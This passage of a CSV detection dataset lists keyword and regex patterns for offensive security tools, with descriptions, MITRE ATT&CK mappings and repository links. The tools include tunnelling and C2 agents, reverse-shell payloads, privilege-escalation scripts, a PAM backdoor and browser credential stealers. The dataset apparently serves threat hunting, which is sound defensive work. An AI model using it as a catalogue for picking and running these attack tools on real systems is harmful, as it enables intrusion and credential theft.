TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo_darwin*",".{0,1000}ligolo_darwin.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with 
elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo_linux*",".{0,1000}ligolo_linux.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo_windows*.exe*",".{0,1000}ligolo_windows.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo-master*",".{0,1000}ligolo\-master.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo-ng -selfcert*",".{0,1000}ligolo\-ng\s\-selfcert.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*ligolo-ng_agent*",".{0,1000}ligolo\-ng_agent.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ligolo-ng_proxy*",".{0,1000}ligolo\-ng_proxy.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ligolo-ng-master*",".{0,1000}ligolo\-ng\-master.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*Lime-Crypter.exe*",".{0,1000}Lime\-Crypter\.exe.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*LimerBoy/Adamantium-Thief*",".{0,1000}LimerBoy\/Adamantium\-Thief.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*LinEnum.sh*",".{0,1000}LinEnum\.sh.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - 
TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","10","10","6668","1964","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*LinEnum-master.ip*",".{0,1000}LinEnum\-master\.ip.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","10","10","6668","1964","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*linikatz.sh*",".{0,1000}linikatz\.sh.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*linikatz.zip*",".{0,1000}linikatz\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*linikatzV2.sh*",".{0,1000}linikatzV2\.sh.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*link_tcp 127.0.0.1 *",".{0,1000}link_tcp\s127\.0\.0\.1\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 
- TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*linkedin2username.py -u*",".{0,1000}linkedin2username\.py\s\-u.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*LinkedInt*",".{0,1000}LinkedInt.{0,1000}","offensive_tool_keyword","LinkedInt","LinkedInt: A LinkedIn scraper for reconnaissance during adversary simulation","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/mdsecactivebreach/LinkedInt","1","0","N/A","5","5","470","112","2023-05-23T23:34:22Z","2017-07-12T12:58:47Z" "*link-inject*inject link into process*",".{0,1000}link\-inject.{0,1000}inject\slink\sinto\sprocess.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*linpeas_builder.py*",".{0,1000}linpeas_builder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_darwin_amd64*",".{0,1000}linpeas_darwin_amd64.{0,1000}","offensive_tool_keyword","exegol","Fully 
featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_darwin_amd64*",".{0,1000}linpeas_darwin_amd64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_darwin_arm64*",".{0,1000}linpeas_darwin_arm64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_darwin_arm64*",".{0,1000}linpeas_darwin_arm64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_fat.sh*",".{0,1000}linpeas_fat\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - 
TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_linux_386*",".{0,1000}linpeas_linux_386.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_linux_386*",".{0,1000}linpeas_linux_386.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_linux_amd64*",".{0,1000}linpeas_linux_amd64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_linux_amd64*",".{0,1000}linpeas_linux_amd64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" 
"*linpeas_linux_arm*",".{0,1000}linpeas_linux_arm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_linux_arm64*",".{0,1000}linpeas_linux_arm64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linux/x64/meterpreter/reverse_tcp*",".{0,1000}linux\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*linux/x64/shell_reverse_tcp*",".{0,1000}linux\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*linux_hostrecon*",".{0,1000}linux_hostrecon.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*linux_hostrecon.*",".{0,1000}linux_hostrecon\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Linux_LPE_eBPF_CVE*",".{0,1000}Linux_LPE_eBPF_CVE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*linux_sudo_cve-2017-1000367.c*",".{0,1000}linux_sudo_cve\-2017\-1000367\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*linux_trap_command.py*",".{0,1000}linux_trap_command\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*linux_x64_agent --report * -l * -s ph4ntom*",".{0,1000}linux_x64_agent\s\-\-report\s.{0,1000}\s\-l\s.{0,1000}\s\-s\sph4ntom.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*LinuxARMLELF32.py*",".{0,1000}LinuxARMLELF32\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*linux-exploit-suggester.sh*",".{0,1000}linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linux-pam-backdoor-master*",".{0,1000}linux\-pam\-backdoor\-master.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*linuxprivchecker*",".{0,1000}linuxprivchecker.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. 
clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","N/A","N/A","10","1482","491","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z" "*linuxprivchecker*",".{0,1000}linuxprivchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*linux-rds-exploit.c*",".{0,1000}linux\-rds\-exploit\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*linux-smart-enumeration.sh*",".{0,1000}linux\-smart\-enumeration\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*linux-smart-enumeration-master*",".{0,1000}linux\-smart\-enumeration\-master.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*linWinPwn-*",".{0,1000}linWinPwn\-.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*linWinPwn.*",".{0,1000}linWinPwn\..{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*lion2john.pl*",".{0,1000}lion2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*lion2john-alt.pl*",".{0,1000}lion2john\-alt\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*LiquidSnake.exe*",".{0,1000}LiquidSnake\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*List the named pipes on a remote system*",".{0,1000}List\sthe\snamed\spipes\son\sa\sremote\ssystem.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*list/steal token of user *default NT AUTHORITY\\SYSTEM for 
comamnd execution*",".{0,1000}list\/steal\stoken\sof\suser\s\.{0,1000}default\sNT\sAUTHORITY\\\\SYSTEM\sfor\scomamnd\sexecution.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*list_backdoors*",".{0,1000}list_backdoors.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*List_Privileges /Process:powershell*",".{0,1000}List_Privileges\s\/Process\:powershell.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*list_tcppivot*",".{0,1000}list_tcppivot.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*list_tokens 
-u*",".{0,1000}list_tokens\s\-u.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" "*ListAccountsWithSPN*",".{0,1000}ListAccountsWithSPN.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*List-AllMailboxAndPST.ps1*",".{0,1000}List\-AllMailboxAndPST\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 